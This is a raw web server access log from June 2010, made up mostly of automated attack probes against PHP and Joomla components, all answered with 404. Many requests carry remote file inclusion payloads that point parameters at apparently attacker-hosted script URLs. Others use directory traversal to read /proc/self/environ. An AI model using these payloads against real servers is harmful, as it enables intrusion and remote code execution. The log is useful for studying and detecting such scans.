208.110.132.7 - - [01/Jun/2010:00:32:24 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:00:32:36 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:00:32:36 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:00:32:36 -0500] "GET /logs/access_log.1262649600//modules/agendax/addevent.inc.php?agendax_path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:00:32:37 -0500] "GET /logs/access_log.1262649600//modules/agendax/addevent.inc.php?agendax_path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:00:32:37 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:00:32:37 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.46.199.37 - - [01/Jun/2010:00:32:55 -0500] "GET /logs/access_log.1188000000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.7.185.19 - - [01/Jun/2010:00:33:02 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.7.185.19 - - [01/Jun/2010:00:33:02 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
216.7.185.19 - - [01/Jun/2010:00:33:08 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.7.185.19 - - [01/Jun/2010:00:33:09 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
208.110.132.7 - - [01/Jun/2010:00:33:19 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:00:33:19 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:00:33:19 -0500] "GET /logs/access_log.1271548800//modules/agendax/addevent.inc.php?agendax_path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:00:33:19 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:00:33:19 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:00:33:19 -0500] "GET /logs/access_log.1271548800//modules/agendax/addevent.inc.php?agendax_path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:00:33:25 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:00:33:25 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:00:33:25 -0500] "GET /logs/access_log.1271548800//modules/agendax/addevent.inc.php?agendax_path=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
118.129.166.213 - - [01/Jun/2010:00:34:25 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
121.190.102.21 - - [01/Jun/2010:00:34:31 -0500] "GET /logs/access_log.1271548800/send_reminders.php?includedir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:00:34:31 -0500] "GET /send_reminders.php?includedir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:00:34:31 -0500] "GET /logs/send_reminders.php?includedir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
174.121.22.5 - - [01/Jun/2010:00:37:07 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.46.13.142 - - [01/Jun/2010:00:39:56 -0500] "GET /logs/access_log.1241395200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.238.145.196 - - [01/Jun/2010:00:40:08 -0500] "GET /alpha.php?Absolute_Path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 293 "-""Mozilla/5.0"
89.238.145.196 - - [01/Jun/2010:00:40:09 -0500] "GET /logs/alpha.php?Absolute_Path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.238.145.196 - - [01/Jun/2010:00:40:09 -0500] "GET /alpha.php?Absolute_Path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 293 "-""Mozilla/5.0"
89.238.145.196 - - [01/Jun/2010:00:40:09 -0500] "GET /logs/alpha.php?Absolute_Path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.238.145.196 - - [01/Jun/2010:00:40:10 -0500] "GET /logs/access_log.1271462400/alpha.php?Absolute_Path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.238.145.196 - - [01/Jun/2010:00:40:10 -0500] "GET /logs/access_log.1271462400/alpha.php?Absolute_Path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.102.1.206 - - [01/Jun/2010:00:40:51 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.79.130 - - [01/Jun/2010:00:41:10 -0500] "GET /logs/access_log.1273017600%20%20/index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
174.121.79.130 - - [01/Jun/2010:00:41:10 -0500] "GET /logs/index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
174.121.79.130 - - [01/Jun/2010:00:41:10 -0500] "GET /index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
174.121.79.130 - - [01/Jun/2010:00:41:14 -0500] "GET /logs/access_log.1273363200%20%20/index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:00:41:35 -0500] "GET /logs/access_log.1262563200/send_reminders.php?includedir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:00:41:35 -0500] "GET /logs/access_log.1272326400/send_reminders.php?includedir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
89.188.107.54 - - [01/Jun/2010:00:41:37 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.caliner.com/rencontres/captcha/fonts/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
89.188.107.54 - - [01/Jun/2010:00:41:37 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.caliner.com/rencontres/captcha/fonts/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
89.188.107.54 - - [01/Jun/2010:00:41:37 -0500] "GET /logs/access_log.1272499200//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.caliner.com/rencontres/captcha/fonts/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:00:41:43 -0500] "GET /logs/access_log.1273017600%20%20/index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:00:41:43 -0500] "GET /logs/index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:00:41:43 -0500] "GET /index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
174.121.79.130 - - [01/Jun/2010:00:41:54 -0500] "GET /index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
174.121.79.130 - - [01/Jun/2010:00:41:54 -0500] "GET /logs/index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
174.121.79.130 - - [01/Jun/2010:00:41:54 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:00:41:58 -0500] "GET /logs/access_log.1273363200%20%20/index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:00:44:09 -0500] "GET /index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:00:44:09 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:00:44:09 -0500] "GET /logs/index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
174.121.79.130 - - [01/Jun/2010:00:44:15 -0500] "GET /logs//index.php?option=com_jeformcr&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.121.79.130 - - [01/Jun/2010:00:44:15 -0500] "GET //index.php?option=com_jeformcr&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.121.79.130 - - [01/Jun/2010:00:44:15 -0500] "GET /logs/access_log.1272412800//index.php?option=com_jeformcr&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:00:44:29 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:00:44:31 -0500] "GET //index.php?option=com_jeformcr&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:00:44:31 -0500] "GET /logs//index.php?option=com_jeformcr&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:00:44:32 -0500] "GET /logs/access_log.1274572800//index.php?option=com_jeformcr&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
118.129.166.213 - - [01/Jun/2010:00:44:39 -0500] "GET /logs/access_log.1274313600//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:00:44:39 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:00:44:40 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.79"
114.108.177.125 - - [01/Jun/2010:00:44:54 -0500] "GET /logs/access_log.1272412800//index.php?option=com_jeformcr&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:00:45:01 -0500] "GET //index.php?option=com_jeformcr&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:00:45:01 -0500] "GET /logs/access_log.1272412800//index.php?option=com_jeformcr&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:00:45:01 -0500] "GET /logs//index.php?option=com_jeformcr&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:45:14 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:45:14 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:45:14 -0500] "GET /logs/access_log.1223683200%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:45:25 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:45:25 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:45:25 -0500] "GET /logs/access_log.1223683200%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:45:26 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:45:26 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:45:26 -0500] "GET /logs/access_log.1223683200%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:45:26 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:45:26 -0500] "GET /logs/access_log.1223683200%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:45:26 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:00:46:03 -0500] "GET /logs/index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:00:46:03 -0500] "GET /index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:00:46:05 -0500] "GET /logs/access_log.1273017600%20%20/index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:00:46:50 -0500] "GET /logs/access_log.1273363200%20%20/index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.46.13.87 - - [01/Jun/2010:00:46:55 -0500] "GET /logs/access_log.1162598400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.177.125 - - [01/Jun/2010:00:47:13 -0500] "GET /index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:00:47:13 -0500] "GET /logs/index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:00:47:14 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:00:47:16 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
87.250.255.243 - - [01/Jun/2010:00:47:22 -0500] "GET /logs/access_log.1218240000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.37.150.18 - - [01/Jun/2010:00:47:27 -0500] "GET /logs/access_log.1273017600//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
72.37.150.18 - - [01/Jun/2010:00:47:27 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
72.37.150.18 - - [01/Jun/2010:00:47:27 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
123.243.67.208 - - [01/Jun/2010:00:47:41 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
67.195.112.180 - - [01/Jun/2010:00:48:23 -0500] "GET /logs/access_log.1161388800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.188.107.54 - - [01/Jun/2010:00:48:31 -0500] "GET /logs/access_log.1223683200%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.caliner.com/rencontres/captcha/fonts/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:49:12 -0500] "GET /logs/access_log.1271548800//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:49:12 -0500] "GET /logs/access_log.1271548800//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:49:17 -0500] "GET /logs/access_log.1271548800//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
216.7.185.19 - - [01/Jun/2010:00:50:33 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.7.185.19 - - [01/Jun/2010:00:50:33 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
194.100.228.237 - - [01/Jun/2010:00:50:44 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:00:50:44 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:00:50:44 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:00:50:45 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
216.7.185.19 - - [01/Jun/2010:00:50:48 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.7.185.19 - - [01/Jun/2010:00:50:48 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
207.46.199.185 - - [01/Jun/2010:00:51:06 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.188.107.54 - - [01/Jun/2010:00:51:13 -0500] "GET /logs/access_log.1271548800//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.caliner.com/rencontres/captcha/fonts/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
118.129.166.213 - - [01/Jun/2010:00:51:20 -0500] "GET /logs/access_log.1273017600//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:00:51:21 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:00:51:21 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:00:52:37 -0500] "GET /logs/access_log.1273363200//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.79"
174.121.22.5 - - [01/Jun/2010:00:53:04 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.121.22.5 - - [01/Jun/2010:00:53:04 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.121.22.5 - - [01/Jun/2010:00:53:04 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
114.108.177.125 - - [01/Jun/2010:00:53:34 -0500] "GET /logs//index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:00:53:35 -0500] "GET //index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:00:53:35 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.13.132 - - [01/Jun/2010:00:54:55 -0500] "GET /logs/access_log.1178668800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.129.166.213 - - [01/Jun/2010:00:55:32 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.79"
89.188.107.54 - - [01/Jun/2010:00:57:05 -0500] "GET //encapscms_PATH/core/core.php?root=http://www.caliner.com/rencontres/captcha/fonts/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
89.188.107.54 - - [01/Jun/2010:00:57:05 -0500] "GET /logs/access_log.1272585600//encapscms_PATH/core/core.php?root=http://www.caliner.com/rencontres/captcha/fonts/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
89.188.107.54 - - [01/Jun/2010:00:57:05 -0500] "GET /logs//encapscms_PATH/core/core.php?root=http://www.caliner.com/rencontres/captcha/fonts/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
89.188.107.54 - - [01/Jun/2010:00:57:21 -0500] "GET /logs/access_log.1272326400//encapscms_PATH/core/core.php?root=http://www.caliner.com/rencontres/captcha/fonts/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:57:39 -0500] "GET /logs/access_log.1270512000//encapscms_PATH/core/core.php?root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:57:39 -0500] "GET /logs//encapscms_PATH/core/core.php?root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:57:39 -0500] "GET //encapscms_PATH/core/core.php?root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:57:41 -0500] "GET //encapscms_PATH/core/core.php?root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:57:41 -0500] "GET /logs/access_log.1270512000//encapscms_PATH/core/core.php?root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:57:41 -0500] "GET /logs//encapscms_PATH/core/core.php?root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:57:42 -0500] "GET //encapscms_PATH/core/core.php?root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:57:42 -0500] "GET /logs/access_log.1270512000//encapscms_PATH/core/core.php?root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:57:42 -0500] "GET /logs//encapscms_PATH/core/core.php?root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:57:49 -0500] "GET /logs//encapscms_PATH/core/core.php?root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:57:49 -0500] "GET //encapscms_PATH/core/core.php?root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
74.124.198.60 - - [01/Jun/2010:00:57:49 -0500] "GET /logs/access_log.1270512000//encapscms_PATH/core/core.php?root=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
